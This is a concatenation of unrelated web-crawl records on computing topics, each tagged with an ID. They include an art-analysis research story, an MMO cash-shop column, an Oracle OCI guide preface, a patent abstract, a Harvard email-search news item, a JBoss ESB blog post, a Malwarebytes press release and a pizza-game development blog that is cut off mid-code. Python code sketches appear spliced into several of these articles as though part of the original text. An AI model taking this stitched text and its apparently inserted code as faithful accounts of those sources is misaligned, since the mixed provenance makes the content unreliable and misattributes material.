Hi, my name is Charles Husemann and I've been gaming for longer than I care to admit. For me it's always been about competing and a burning off stress. It started off simply enough with Choplifter and Lode Runner on the Apple //e, then it was the curse of Tank and Yars Revenge on the 2600. The addiction subsided somewhat until I went to college where dramatic decreases in my GPA could be traced to the release of X:Com and Doom. I was a Microsoft Xbox MVP from 2009 to 2014 | 计算机 |
2015-48/3681/en_head.json.gz/5536 | Research shows that computers can match humans in art analysis
Jane Tarakhovsky is the daughter of two artists, and it looked like she was leaving the art world behind when she decided to become a computer scientist. But her recent research project at Lawrence Technological University has demonstrated that computers can compete with art historians in critiquing painting styles.
While completing her master's degree in computer science earlier this year, Tarakhovsky used a computer program developed by Assistant Professor Lior Shamir to demonstrate that a computer can find similarities in the styles of artists just as art critics and historians do.
In the experiment, published in the ACM Journal on Computing and Cultural Heritage and widely reported elsewhere, Tarakhovsky and Shamir used a complex computer algorithm to analyze approximately 1,000 paintings by 34 well-known artists, and found similarities between them based solely on the visual content of the paintings. Surprisingly, the computer provided a network of similarities between painters that is largely in agreement with the perception of art historians.
For instance, the computer placed the High Renaissance artists Raphael, Da Vinci, and Michelangelo very close to each other. The Baroque painters Vermeer, Rubens and Rembrandt were placed in another cluster.
The experiment was performed by extracting 4,027 numerical image content descriptors – numbers that reflect the content of the image, such as texture, color, and shapes, in a quantitative fashion. The analysis reflected many aspects of the visual content and used pattern recognition and statistical methods to detect complex patterns of similarities and dissimilarities between the artistic styles. The computer then quantified these similarities.
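A drastically simplified sketch of that kind of pipeline is shown below. It is an illustration only — not the 4,027-descriptor scheme used in the study — and the handful of features and the random stand-in "paintings" are invented for the example.

import numpy as np

# Toy stand-in for the pipeline described above. Each image is assumed to be
# a grayscale array with values in [0, 255].

def describe(image):
    """Return a tiny numerical descriptor: brightness statistics, a coarse
    histogram, and a crude texture measure (mean gradient magnitude)."""
    img = image.astype(float)
    hist, _ = np.histogram(img, bins=8, range=(0, 255), density=True)
    gy, gx = np.gradient(img)
    texture = np.mean(np.hypot(gx, gy))
    return np.concatenate([[img.mean(), img.std(), texture], hist])

def similarity_matrix(images):
    """Pairwise similarity = negative Euclidean distance between z-scored
    descriptors, so higher means 'more alike'."""
    feats = np.array([describe(im) for im in images])
    feats = (feats - feats.mean(axis=0)) / (feats.std(axis=0) + 1e-9)
    diff = feats[:, None, :] - feats[None, :, :]
    return -np.sqrt((diff ** 2).sum(axis=2))

# Example with random stand-in "paintings":
paintings = [np.random.randint(0, 256, (64, 64)) for _ in range(4)]
print(similarity_matrix(paintings).round(2))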
According to Shamir, non-experts can normally make the broad differentiation between modern art and classical realism, but they have difficulty telling the difference between closely related schools of art such as Early and High Renaissance or Mannerism and Romanticism.
“This experiment showed that machines can outperform untrained humans in the analysis of fine art,” Shamir said.
Tarakhovsky, who lives in Lake Orion, is the daughter of two Russian artists. Her father was a member of the former USSR Artists. She graduated from an art school at 15 years old and earned a bachelor’s degree in history in Russia, but has switched her career path to computer science since emigrating to the United States in 1998.
Tarakhovsky utilized her knowledge of art to demonstrate the versatility of an algorithm that Shamir originally developed for biological image analysis while working on the staff of the National Institutes of Health in 2009. She designed a new system based on the code and then designed the experiment to compare artists.
She also has used the computer program as a consultant to help a client identify bacteria in clinical samples.
“The program has other applications, but you have to know what you are looking for,” she said.
Tarakhovsky believes that there are many other applications for the program in the world of art. Her research project with Shamir covered a relatively small sampling of Western art. “This is just the tip of the iceberg,” she said.
At Lawrence Tech she also worked with Professor CJ Chung on Robofest, an international competition that encourages young students to study science, technology, engineering and mathematics, the so-called STEM subjects.
“My professors at Lawrence Tech have provided me with a broad perspective and have encouraged me to go to new levels,” she said.
She said that her experience demonstrates that women can succeed in scientific fields like computer science and that people in general can make the transition from subjects like art and history to scientific disciplines that are more in demand now that the economy is increasingly driven by technology.
“Everyone has the ability to apply themselves in different areas,” she said. | 计算机 |
2015-48/3681/en_head.json.gz/5580 | The Devil's Advocate: What's for Sale and What's at StakeColumn By Victor Barreiro Jr. on July 04, 2012
In the world of gaming, double-dipping is the practice of generating an additional revenue stream from the same product by selling that product a second time in a new incarnation, such as a special edition. While the nature of what constitutes double-dipping in this day and age has been muddled by the increasing number of ways in which developers attempt to coax money out of our pockets, it can be said that a blatant show of it can sour the perception of the public towards a product (even as those same people consider signing up for that extra doohickey or perk).Trying to talk about such practices in MMORPGs is difficult, however, mostly because there are different payment matrices available in online games. There are also a variety of ways by which developers draw consumer money out from pockets and into development coffers. Most of them involve paying for extra goods or services. advertisement One path taken by a good number of online game developers these days is the cash shop route, and today's Devil's Advocate seeks to discuss whether there are legitimate concerns to be had in certain cash shop practices. We'll look at some practices that have occurred in recent years, and discuss how these practices have shaped the MMORPG landscape and what you can do to alter the landscape yourself.Shopping in Subscription GamesWhile free-to-play titles generally survive on cash shop revenue for development, it's the subscription games that engender a lot of backlash from gamers for selling extras. At its core, MMO double-dipping as a practice is strongly associated with the combination of subscription games and the sale of additional virtual items or services.While the history of this practice hasn't really been documented fully, some people tend to think the Celestial Steed commotion of World of Warcraft started the notion of subscription-based MMOs selling extra services or items, whether it was in-game or out of it. Other titles like RIFT, with its 10-dollar digital upgrades, and The Secret World, with its in-game store, have also taken up the charge, in a manner of speaking.Whatever the catalyst was for the subscription-with-shop model, there was one noticeable change it brought to developers' minds. At last, it now seemed alright to ask consumers of subscription and free-to-play games to pay for services and virtual goods that had legitimate uses or understandable creative or developmental costs, such as server transfers, name and race changes, or fluff items.Fluff and “Low-Impact” ItemsThat said, the sale of fluff and what I term as “low-impact” items are a staple of the cash shop phenomenon. By fluff and “low-impact,” I refer to the sale of items that are either cosmetic in nature, such as pets, clothing, and dyes, or have little impact on game progression or power levels outside of solo play, such as experience or progress bar accelerators in a variety of games.I feel that many people find the peddling of fluff and low-impact items generally innocuous. Historically speaking though, when someone sets a precedent for a given value or idea and it succeeds in assimilating itself as an alright practice, other things follow.From a certain point of view, there is one thing to worry about when it comes to selling fluff or low-impact items, and that's defining the upper limit of what is considered low-impact to begin with. 
Famously, there's the issue of having travel buffs and mounts for sale, especially if games are designed to start you off without a mount or without the money to purchase a mount at the offset. More notably, Warner Bros. and Turbine came out with starter armor kits on the LOTRO Store as a way for those who want to pay for the convenience of being a little bit more effective at the start of the game. | 计算机 |
2015-48/3681/en_head.json.gz/6557 | Oracle Call Interface Programmer's Guide
The Oracle Call Interface (OCI) is an application programming interface (API) that allows applications written in C or C++ to interact with one or more Oracle database servers. OCI gives your programs the capability to perform the full range of database operations that are possible with an Oracle database server, including SQL statement processing and object manipulation.
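OCI itself is a C API, so its call sequences (allocate handles, prepare, execute, fetch) are written in C and its exact prototypes live in the OCI headers. As a rough feel for the statement-processing flow only, the short sketch below shows the equivalent steps through cx_Oracle, a Python driver built on top of OCI; the credentials, DSN, and EMPLOYEES table are placeholders, not values taken from this guide.

import cx_Oracle

# Hypothetical connection details -- replace with your own user/password/DSN.
conn = cx_Oracle.connect("scott", "tiger", "dbhost/orclpdb")
try:
    cur = conn.cursor()
    # Statement processing: prepare, execute, and fetch are handled by OCI underneath.
    cur.execute(
        "SELECT employee_id, last_name FROM employees WHERE rownum <= :n",
        n=5,
    )
    for employee_id, last_name in cur:
        print(employee_id, last_name)
finally:
    conn.close()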
The Preface includes the following sections:
The Oracle Call Interface Programmer's Guide is intended for programmers developing new applications or converting existing applications to run in the Oracle environment. This comprehensive treatment of OCI will also be valuable to systems analysts, project managers, and others interested in the development of database applications.
This guide assumes that you have a working knowledge of application programming using C. Readers should also be familiar with the use of Structured Query Language (SQL) to access information in relational database systems. In addition, some sections of this guide also assume a knowledge of the basic concepts of object-oriented programming.
See Also: For information about SQL, refer to the Oracle9i SQL Reference and the Oracle9i Database Administrator's Guide.
For information about basic Oracle concepts, see Oracle9i Database Concepts.
For information about the differences between the Standard Edition and the Enterprise Edition and all the features and options that are available to you, see Oracle9i Database New Features.
The Oracle Call Interface Programmer's Guide contains four parts, split between two volumes. A brief summary of what you will find in each chapter and appendix follows:
PART I: OCI CONCEPTS
Part I (Chapter 1 through Chapter 9) provides conceptual information about how to program with OCI to build scalable application solutions that provide access to relational data in an Oracle database.
Chapter 1, "Introduction and Upgrading"
This chapter introduces you to the Oracle Call Interface and describes special terms and typographical conventions that are used in describing the interface. This chapter also discusses features new to the current release. | 计算机 |
2015-48/3681/en_head.json.gz/7535 | A method and system for monitoring, controlling and diagnosing operation of a machine such as a business office machine including a facsimile machine, a copier, and a printer. When the speed of communication between the remote device and machine is not urgent, a connectionless mode of communication may be used. The form of connectionless communication is an electronic mail message transmitted over the Internet. However, when a condition needs urgent action, a direct connection is used for communication such as communication via a telephone or ISDN line. The information obtained from the machine is stored in one or more data bases within a company and information of the machine is shared between a service department, engineering and design department, manufacturing department, and marketing department. As communication over the Internet via electronic mail is not secure, the connectionless-mode messages transmitted using Internet electronic mail are encrypted.
1. A business office device configured to connect to a monitoring device that monitors the business office device, the business office device comprising:
at least one memory, within the business office device, for storing status information of the business office device; and
a communications interface, within the business office device, for transmitting, using an Internet e-mail protocol at an application layer, an e-mail containing a first portion of the status information to the monitoring device, wherein the business office device is selected from the group consisting of a printer, a copier, a scanner, a metering system and a multi-function copier.
2. The business office device as claimed in claim 1, further comprising a direct connection mode-based interface for transmitting to the monitoring device at least one of a second portion of the status information and the first portion of the status information.
3. The business office device as claimed in claim 2, wherein the at least one memory stores the status information such that both the e-mail interface and the direct connection- | 计算机 |
2015-48/3681/en_head.json.gz/7940 | More secret email searches revealed at Harvard PC Advisor
More secret email searches revealed at Harvard
Dean admits she failed to report additional searches to higher-ups
John P. Mello | CSO
A dean at Harvard University who led a probe into leaked information in a cheating scandal admitted Tuesday that she failed to report two secret searches of a fellow dean's email accounts.At a meeting of the university's Faculty of Arts and Sciences (FAS), Dean Evelynn M. Hammond disclosed that she authorized two email searches that she failed to report to the dean of the FAS, Michael D. Smith.By failing to report those searches, they were omitted from a communication issued by the university on March 11, after news of the email searches, conducted last fall, was revealed in the Boston Globe.In a prepared statement, Hammonds explained that one of the unreported searches was conducted to determine if the dean who leaked an internal document had any contact with two students involved in the cheating scandal.The other search was of the suspected dean's personal email account at the university for subject line information, and the student's names. Previously, the university said only the administrative email accounts of the 16 deans suspected of leaking information to the Globe and Harvard Crimson were searched for information."Let me be clear, no emails were opened and no content was searched," she told those attending the meeting. "This search was conducted because I was concerned that the deliberations of the [FAS Administrative Board] had been compromised and that this loss of confidentiality would result in reputational damage to students whose cases were under review, and undermine our process on ensuring that all students get a fair hearing."Harvard President Drew Faust also addressed those attending the FAS forum. She found the university's policies regarding electronic communication wanting. "[W]e have highly inadequate institutional policy and process around the rapidly and constantly evolving world of electronic communication," she said. "We have multiple policies across the university that vary across schools, with some faculties lacking any explicit policies at all."That lack of university policies in the electronic realm, she observed, "constitutes a significant institutional failure to provide adequate guidance and direction in a digital environment that is a powerful and rapidly changing force in all of our lives."[See also: Privacy war heats up between ACLU, DOJ]Those kinds of policies are important for a copasetic workplace. "When an employer engages in a search of employee email, they have to be very careful to set out the terms of what they're doing internally and to make sure their agents are following the rules -- otherwise you can get yourself into quite a mess," said Neil Richards, a professor of law at Washington University in St. Louis.The people ordering a search also need to be on the same page as those conducting the search. "Administrators have to have a grasp of technology and IT people have to embrace privacy as a professional value," Richards added.An institution investigating an internal data breach has a dilemma. "If I call you and say, 'We're going to look through your email because we think you did something wrong,' you may go and clean up the evidence," said Mike Corn, chief privacy and security officer at the University of Illinois in Urbana-Champaign."If there's an investigation going on that's sensitive and could involve unethical behavior, does our obligation to treat you respectfully trump our obligations to the investigation?" 
Corn asked."That's a very nuanced and difficult question to answer without a specific context," he continued, "but it goes to the heart of the Harvard matter."In explaining why she failed to report the two searches when contributing to the March 11 apology statement, Hammond said she failed "to recollect the additional searches."That's disquieting, said Robert L. Shibley, senior vice president for the Foundation for Individual Rights in Education (FIRE) in Philadelphia. "If that's true, that's very disturbing," he told CSO. "What it suggests is that reading emails at Harvard is so common that it's not even worth remembering.""I would like to think that if a university is going to be scanning emails that would be unusual enough that you'd remember all the investigations that you've done," Shibley added.Read more about data privacy in CSOonline's Data Privacy section.
2015-48/3681/en_head.json.gz/8341 | JBoss acquires enterprise-ready ESB Posted by
Mark Little Jun 15, 2006
After several months of discussions around the right architecture for a SOA infrastructure for the 21st Century and much community involvement, an alpha version of JBossESB was released in March which outlined many of the architectural principles. We've had great feedback from community developers, partners and prospective customers, all of them endorsing the approach we're taking: that JBossESB is a SOA infrastructure supporting best-of-breed deployments based on JEMS and partner technologies. However, the one thing that we were having difficulty on was keeping up with interest and demand: everyone wants JBossESB yesterday. In the week following the closure of the Redhat deal, the JBoss division has made a strategic move to address that deficiency with the acquisition of the Rosetta ESB. Rosetta is an ESB that's been in production deployments for over 3 years, handle tens of thousands of real-time and batch processing events from legacy and J2EE applications, insurance underwriting and real-time quote requests. Although Rosetta doesn't match the architecture the ESB team have been working on, it is close enough that with concerted effort we'll soon be in a position to provide a production-ready version of JBossESB that will become the premier development and deployment platform for SOA in the industry. What we have done up to this point is lay the foundations for that platform. With this acquisition, we are building on those strong foundations and pushing the community effort into a new and important phase. It's worth spending a few moments just to consider exactly what it is that Rosetta brings to JBossESB: support for a variety of messaging services, including JBossMQ and MQSeries; a transformation engine to bridge data formats; a service registry; a persisted event repository to support governance of the ESB environment; a base transport mechanism; pluggable architecture; and a notification service to allow the ESB to register events and signal subscribers. All of this in a product that has been running continuously for 3 years: a pedigree and level of trust that is difficult to find elsewhere in this new and emerging market. Another part of this Rosetta acquisition is that I'm happy to announce that Esteban Schifman, Chief Architect at Heuristica and part of the team that developed Rosetta, will be joining the JBossESB team. As well as his Rosetta knowledge, Esteban brings a great deal of experience in this space which will be critical for Redhat's success with JBossESB. I'd like to welcome Esteban to a great community of like-minded developers and users: I'm sure he'll find it as stimulating as the rest of us. Finally, just to recap and briefly indicate where we are going next. JBoss has been making good progress in the SOA space with JEMS and early work on JBossESB; we've seen significant take-up of our technologies and ideas by customers and partners alike. Now that we've acquired Rosetta, we'll be able to accelerate our plans for delivering on the architectural goals we have developed and hopefully benefit the community at large with the preeminent SOA platform we all agree is needed. Redhat is uniquely poised at this stage to deliver on that requirement with JBossESB. We'll have a beta version available in the next few months and a GA ready by the end of the year. If you're at JBoss World Vegas then come and hear my talk on the subject. One last thing: if you're interested in participating, please get in touch! 
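As a conceptual sketch of what such a bus does — transform messages between formats, record them for governance, and route them to subscribers — and emphatically not the JBossESB or Rosetta API, consider:

from dataclasses import dataclass, field
from typing import Callable, Dict, List

@dataclass
class Message:
    kind: str
    body: dict

@dataclass
class Bus:
    transformers: List[Callable[[Message], Message]] = field(default_factory=list)
    routes: Dict[str, List[Callable[[Message], None]]] = field(default_factory=dict)
    event_log: List[Message] = field(default_factory=list)   # "persisted event repository"

    def subscribe(self, kind: str, handler: Callable[[Message], None]) -> None:
        self.routes.setdefault(kind, []).append(handler)

    def publish(self, msg: Message) -> None:
        for transform in self.transformers:            # bridge data formats
            msg = transform(msg)
        self.event_log.append(msg)                     # record for governance/auditing
        for handler in self.routes.get(msg.kind, []):  # notify subscribers
            handler(msg)

bus = Bus(transformers=[lambda m: Message(m.kind, {**m.body, "normalized": True})])
bus.subscribe("quote.request", lambda m: print("underwriting service got:", m.body))
bus.publish(Message("quote.request", {"amount": 10_000}))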
This is a thriving community, but there's always room for more involvement. | 计算机 |
2015-48/3681/en_head.json.gz/8422 | Deutsch Español Français Italiano Português (Portugal)
Nederlands Polskie Pусский Search Malwarebytes Press Center
For Home Malwarebytes Anti-Malware Free
Malwarebytes Anti-Malware Premium
Malwarebytes Anti-Malware for Mac
Malwarebytes Anti-Exploit Free
Malwarebytes Anti-Exploit Premium
Malwarebytes Anti-Malware Mobile
Other ToolsSee all
For Business Malwarebytes Anti-Malware Remediation Tool
Malwarebytes Anti-Malware for Business
Malwarebytes Anti-Exploit for Business
Malwarebytes Endpoint Security
Downloads Products
Awards/Testimonials
Support Consumer Support
Language Select English Deutsch Español Français Italiano Portuguëse (Portugal)
Portuguëse (Brazil)
Nederlands Polskie Pусский Malwarebytes Press Center
Malwarebytes Anti-Malware 2.0 launches to proactively protect home PCs from advanced stealthy malware
The new 2.0 version of the anti-malware software that fixed 208m PCs last year combines five powerful new tools into a single download and commits to XP support
San Jose: Malwarebytes today announces the launch of Malwarebytes Anti-Malware 2.0, a new tool designed to proactively protect home PCs against advanced criminal software which traditional anti-virus cannot detect. In development for over 18 months, Malwarebytes Anti-Malware 2.0 is the first completely new version of the company’s flagship security software for six years, and is designed to work alongside traditional antivirus to provide additional protection.
Malwarebytes Anti-Malware 2.0 will continue to support XP users, who currently make up 20% of Malwarebytes’ user-base and could be at greater risk when updates stop on April 8.
The new product brings together five powerful technologies in a lightweight 16MB download for the first time, the combination of which provides dynamic protection from advanced threats. At its core is a new heuristics engine, designed to detect and kill malicious software based on behavior. This means protection is not reliant on slow-moving signatures, providing defense against zero-day attacks.
Malwarebytes Anti-Malware 2.0 also integrates new Anti-Rootkit technology, which rips out and fixes the damage done by malicious software hiding at an extremely deep-level in the operating system. Malwarebytes’ Chameleon is also built-in, allowing Malwarebytes Anti-Malware 2.0 to brute force start-up and scan when malware is crippling traditional security software and other processes.
Malwarebytes Anti-Malware Premium, which replaces the acclaimed Malwarebytes Anti-Malware PRO, adds updated malicious URL blocking and enhanced protection from unwanted programs such as aggressive adware and toolbars. A new user interface and ultra-quick threat scan ensure the product is easy to use.
Marcin Kleczynski, founder and CEO of Malwarebytes, said, “Six years after the launch of the first version, and following 18 months of development and countless research hours, we are thrilled to announce Malwarebytes Anti-Malware 2.0.
“It has been a real labor of love. We are proud of what we have created and believe it builds upon the success of our existing products to give people a strong proactive countermeasure against today’s advanced online threats.”
The new product does not replace Malwarebytes’ acclaimed free clean-up tool, which the company has committed to providing for free forever.
Malwarebytes Anti-Malware Premium is available from the online store for an annual subscription of $24.95, and provides coverage for up to three PCs. Users with existing lifetime licenses for Malwarebytes Anti-Malware PRO will receive a free upgrade to the new product.
About Malwarebytes
Malwarebytes provides software designed to protect consumers and businesses against malicious threats that consistently escape detection by other antivirus solutions. Malwarebytes Anti-Malware Pro, the company’s flagship product, employs a highly advanced behavior-based detection engine that has removed more than 5 billion malicious threats from computers worldwide. Founded in 2008, the self-funded company is headquartered in California, operates offices in Europe, and employs a global team of researchers and experts. For more information, please visit us at www.malwarebytes.org.
All product names and trademarks are the property of their respective firms.
© 2015 Malwarebytes | Privacy Policy | Terms of Service | EULA | 计算机 |
2015-48/3681/en_head.json.gz/9041 | AboutCommunity
DocManager
TaskManager
Cvs Tree
Release 0.02a
---Posted by redwagon at 01:49 AM on August 17, 2004
That's right!! We are releasing our second official build of the game, and the team has made some really nice progress over the past months.
http://pizzagame.sourceforge.net/index.php?area=downloads
Ares has put together a solid framework to manage the control of the customers and employees in the game. They visit the restaurant, find their way around walls, walk through doorways, sit at tables, take customer orders at tables, and cook pizzas. I can't wait to see some new character models and animations to compliment Ares' coding skills.
Also, All_Star25 has been making some nice strides with the sound engine. So much that we are able to provide some cool background music in the game, which has been provided by Alex Ford.
Last but hopefully not least, I have been able to complete the base framework for some basic Lua scripting functionality to manage the restaurant furniture and appliances.
As always, do feel free to make comments or offer suggests in the project forum.
---Posted by Ares at 08:51 PM on July 08, 2004
Work on the game continues to move along steadily. I am continuing to make progress on the simulation - bits and pieces of it are at a state of completion where they are working in a rudimentary way, notably:
- the code that is used to guide customers from an entry point to an available table with chairs
- the code for directing an employee to wait on customers sitting at a table
- the code for directing an employee to prepare a pizza on a counter
While the game is still not near a playable state, some of our progress is becoming somewhat more visible. Also, all_star25 has been making some progress on creating a working sound engine for the game to enable the playback of sounds and music using OpenAL and Ogg Vorbis. If you have any suggestions or ideas, or simply just have a comment about the game, please visit and make a post in our forums.
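As a rough illustration of how simulation tasks like the ones listed above can be modelled — the project itself is C++ on OGRE, and the step names below are invented — each employee can simply work through a queue of task steps, one per simulation tick:

from collections import deque

class Employee:
    def __init__(self, name):
        self.name = name
        self.tasks = deque()

    def assign(self, *steps):
        # Queue up a sequence of task steps, e.g. walk, take order, cook.
        self.tasks.extend(steps)

    def update(self):
        """Called once per simulation tick; finishes one step at a time."""
        if self.tasks:
            step = self.tasks.popleft()
            print(f"{self.name}: {step}")

waiter = Employee("waiter")
waiter.assign("walk to table 3", "take order", "deliver order to kitchen")
for _ in range(3):
    waiter.update()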
May Update - Pizza Game
---Posted by Ares at 07:02 PM on May 16, 2004
There are a few interesting new things to show since our last update. Firstly, redwagon has done a lot of work on the new GUI. Also, we've gotten the game working with the newest version of OGRE, the graphics engine that we're using for the game. The most notable improvement in the newest version (0.14) is the addition of various shadowing techniques.
Both the new GUI and the addition of shadows can be seen in this screenshot.
If you have any comments, suggestions, or questions concerning the game, please be sure to visit our forums.
March Status Update
---Posted by Ares at 10:51 PM on March 19, 2004
There's not a lot to report. redwagon has been busy with preliminary work on putting together the GUI that will be used in the final game. I've been doing a bit of work on some of the pieces of the simulation. In general, though, there has been progress - just not visible progress. Once redwagon and I feel that enough progress has been made, we'll likely release another (pre)alpha version of the game for anyone who's interested to try out. Just keep in mind that a lot of the work we're doing is stuff that is necessary but won't really be visible to someone just looking at the game. We'll keep you updated on any interesting progress; if you have any questions or suggestions please be sure to visit our forums.
Pizza Game February Update
---Posted by Ares at 05:07 PM on February 22, 2004
Firstly, I apologize for the month long delay between news postings. However, I assure you that this game is not dead, nor will it die in the forseeable future. Things are still moving along although, at times, we move along more slowly than we'd prefer. We don't have that many new things to report, as this past month both redwagon and I have often been unable to find that much time to work on the game. redwagon has begun work on the GUI system that will be present in the playable game, as opposed to the temporary GUI found in our current releases. I have gotten a little more work finished on some of the basic simulation stuff that is required for us to make available a playable game - not as much as I had hoped, but enough to keep us moving forward. That's about all the news I can think of, but I promise to try and post news at least a little more often than once a month.
Pizza Game January Update
---Posted by Ares at 11:39 AM on January 23, 2004
This is just an update to let you know what's been happening with the game. I've begun working on the actual simulation for the game, involving customer and employee tasks. This is the stuff that will allow the employees and customers to act autonomously and perform their jobs - wait tables, cook pizzas, etc.
I've finished integrating the OpenSteer Library into the game. Entity movement and avoidance of each other now uses the library.
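OpenSteer is a C++ steering library; the gist of what it contributes here (head toward a goal while being pushed apart from nearby entities) can be sketched in a few lines, with all numbers invented for the example:

def steer(pos, goal, neighbors, max_speed=1.0, separation=1.5):
    # Seek: head toward the goal.
    vx, vy = goal[0] - pos[0], goal[1] - pos[1]
    # Separation: push away from any neighbor that is too close.
    for nx, ny in neighbors:
        dx, dy = pos[0] - nx, pos[1] - ny
        dist = (dx * dx + dy * dy) ** 0.5
        if 0 < dist < separation:
            vx += dx / dist
            vy += dy / dist
    # Clamp the result to the maximum speed.
    speed = (vx * vx + vy * vy) ** 0.5
    if speed > max_speed:
        vx, vy = vx / speed * max_speed, vy / speed * max_speed
    return vx, vy

print(steer(pos=(0, 0), goal=(5, 0), neighbors=[(0.5, 0.2)]))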
redwagon has integrated the latest OGRE release (0.13) into the game. (Ogre is the graphics engine that we're using).
We've also uploaded a new "Latest Build" for you to try out. We only have the Windows version up right now, and it doesn't include some of the things that I've mentioned above
First Linux Release
---Posted by redwagon at 11:16 PM on December 16, 2003
For the past month, the game has been completely compatible with the Linux Operating System; however, most of the developers are primarily Windows based users and supported the game only under the Microsoft platform until now.
Today, we are proud to announce the very first Linux version binaries of the project, which is still in the early development stages. They are available on the downloads page. We encourage those individuals who have any trouble or suggestions to post in the forum.
Pizza Game Update
Development is moving forward at a nice and steady pace.
The latest addition to the game is the embedding of glass windows into the walls. It is still a bit new and requires some additional work. Imagine if sun rays would cast light into the restaurant structure through the windows; that would look amazing.
We are looking forward to the next release of OGRE, an amazing open-source graphics engine. Hopefully one of its features will include the use of shaders; then, we will have the capability of easily creating a richer game scene with realistic lighting and shadows.
And last but not least, we have been discussing the official name for the game, and we are juggling one title in particular. 'Pizza Game' has been a temporary reference to the project since its inception. So, bear in mind that the project will have an official name soon.
---Posted by Ares at 12:54 AM on November 15, 2003
Even though it's been two months since our last news update, we haven't been slacking off. redwagon has implemented a lot of stuff regarding objects - you can now place various objects in the scene, rotate them using the mouse, move them again after you've placed them, and remove them entirely from the scene. Also of note is that the system that redwagon has come up with is very modular - an object can be added to the game by providing a model of the object and a text file describing the object.redwagon and I also spent a good deal of time the last few days making sure the game compiled and worked properly under Linux. We ran into numerous problems at the code-level that needed to be resolved in order to have the game compile properly. Both redwagon and I were able to solve these problems, however, and got the game to compile properly. We've also had some success getting the game to run - we're having one particular problem, but that's most likely due to our relative inexperience under Linux, as both redwagon and I run Windows as our main development operating system. Nevertheless, we are absolutely insistent that this game run under both (at least) Windows and Linux: we hope that the time we took away from programming the game to make sure that there were no problems with the game under Linux reflects this. Lastly, I have begun initial programming on the simulation engine for the game, so hopefully there will be more news regarding that in the weeks to come. If you're interested in the game, be sure to check out our (albeit somewhat dated)Development Release from September. Or, if you really want to see the more recent progress, check out our Latest Build. One caveat about the latest build, though, we cannot guarantee that it will be stable or even run, although in most cases it will be somewhat stable.
First Developer Build Release
---Posted by redwagon at 08:29 PM on September 17, 2003
In an effort to adhere to the traditional open-source software policy of "Release early, release often", we will provide links to a bi-weekly build of the game starting today. I must stress that these unofficial releases are the most recent stable developer builds and are far from complete, but they will show the progress of the game throughout its development.
Download the Windows version!
Again, this build is a very early alpha. So far the game includes: building walls, applying wallpaper textures, applying floor textures, adding a few objects to the scene, and a robot that walks intelligently around in the game. Try trapping the robot in a room.
Also, I have added a few more screenshots to the website.
Still Chuggin'...
It has obviously been a whole month since our last news posting, so I thought it was definitely overdue for an official update on the status of the project. Unlike as it might appear, the project is still in active development and huge progress is made almost each day.
A few weeks back, we determined that our methods of generating a 3D scene with the aid of the OGRE rendering engine were inappropriate for the complex atmosphere we are trying to create for this game. Thus, application performance suffered heavily and required replanning and newer methods of interacting with OGRE to acheive the results we desire. Of course, this necessity has set us back a bit, but it is well worth the time and effort. In a relatively simplistic 3D scene, we would achieve about 30-40 fps. Now with the improvement we have made, we are able to create the same 3D scene under the same hardware and resolution running at approximately 90-100 fps leaving us with extra frames to kill to improve the game's overall graphical appearance.
So, that is how the project stands now. We are in good shape, the game improves each day, and we will definitely show some new screenshots within the coming weeks.
Pizza Game Status Update
It's been a while since our last update and there's some new news and information. First, we have added a screenshots section to the site. Every once in a while, I'll add screenshots of the game to that section so you can easily track our development simply by looking at the pictures.
What are we currently working on? Well, yesterday I finished up the core of the pathfinding system for the game. After fixing numerous very subtle bugs in things related to the pathfinder (interestingly, none of which were in the actual implementation of the pathfinding algorithm itself) and spending much time with Visual Studio's excellent debugger, the pathfinder is stable and working. Collision detection with walls and doorways is working as well.
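The post doesn't say which algorithm the pathfinder uses; A* over the tile grid is the usual choice for this kind of game, so the sketch below assumes it, along with a made-up room layout:

import heapq

def astar(grid, start, goal):
    """grid[r][c] == 1 means blocked; returns a list of cells or None."""
    rows, cols = len(grid), len(grid[0])
    h = lambda cell: abs(cell[0] - goal[0]) + abs(cell[1] - goal[1])  # Manhattan heuristic
    open_heap = [(h(start), 0, start, None)]
    came_from, best_cost = {}, {start: 0}
    while open_heap:
        _, cost, cell, parent = heapq.heappop(open_heap)
        if cell in came_from:          # already expanded with a better cost
            continue
        came_from[cell] = parent
        if cell == goal:               # walk parents back to rebuild the path
            path = []
            while cell is not None:
                path.append(cell)
                cell = came_from[cell]
            return path[::-1]
        r, c = cell
        for nr, nc in ((r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)):
            if 0 <= nr < rows and 0 <= nc < cols and grid[nr][nc] == 0:
                new_cost = cost + 1
                if new_cost < best_cost.get((nr, nc), float("inf")):
                    best_cost[(nr, nc)] = new_cost
                    heapq.heappush(open_heap, (new_cost + h((nr, nc)), new_cost, (nr, nc), cell))
    return None

room = [[0, 0, 0, 0],
        [1, 1, 1, 0],
        [0, 0, 0, 0]]
print(astar(room, (0, 0), (2, 0)))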
Johnny(mhead) has been working on things related to the "build mode" of the game. Already, he has basic wall placement, wall texturing, and tile texturing completed (with only one outstanding "bug" in the wall texturing).
Essentially, we are still working on much of the "core" game code, rather than the really game-specific things. However, more and more of the game engine foundation is being completed and implemented, and our progress has been very good. Check back once in a while - I'll try to update our progress more often. I'll also be sure to constantly add new screenshots to the screenshot gallery.
First signs of progress
---Posted by redwagon at 10:57 PM on June 19, 2003
Although the game is still in the very early stages of development, we have made considerable progress. It is actually starting to look like a real modern video game. We are so excited and are pleased to share a couple of screenshots.
In the first screenshot, you can see a model we borrowed from Ogre. Keep in mind that the screenshot does not convey the total coolness from watching the character walk in an animated way across the tile map. The screenshot also shows how the player is allowed to interactively place walls along the edges of the tiles indicated by the green semi-transparent wall.
The second screenshot shows the same scene. Notice the change in position and direction of the robot character. Hey! Aren't there a few walls in the scene missing?!?
Pizza Game in Full Development
---Posted by Ares at 08:25 PM on June 16, 2003
Pizza Game has been out of the design stage for about a week now and is under full development. We are currently making excellent progress - no problems have appeared in our design. While the game is still in a very early stage and there's not a whole lot to see, I have some screenshots of the game to share. Keep in mind that we haven't even finished coding the underlying framework for the game. In screenshot 1, we can see an empty "tile map." The grid lines are drawn on for reference. What you see in the screenshot is the "empty lot" upon which you will be able to build a restaurant. Upon this grid you will be able to place walls, doors, furniture, ovens - all the things that are necessary for a pizza restaurant. Screenshot 2 shows the tilemap after having several walls added. Although the walls are just white right now, in the finished game you will be able to apply a variety of different wallpapers to the wall.
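A minimal sketch of that tile-map idea — illustrative Python rather than the game's C++, with invented texture names — might store floor textures per tile and walls per tile edge:

class TileMap:
    def __init__(self, width, height):
        self.width, self.height = width, height
        self.floor = [["grass"] * width for _ in range(height)]
        self.walls = set()          # {((row, col), side)} with side in "N", "S", "E", "W"

    def place_wall(self, row, col, side):
        # Walls sit on tile edges, so a wall can run between two adjacent tiles.
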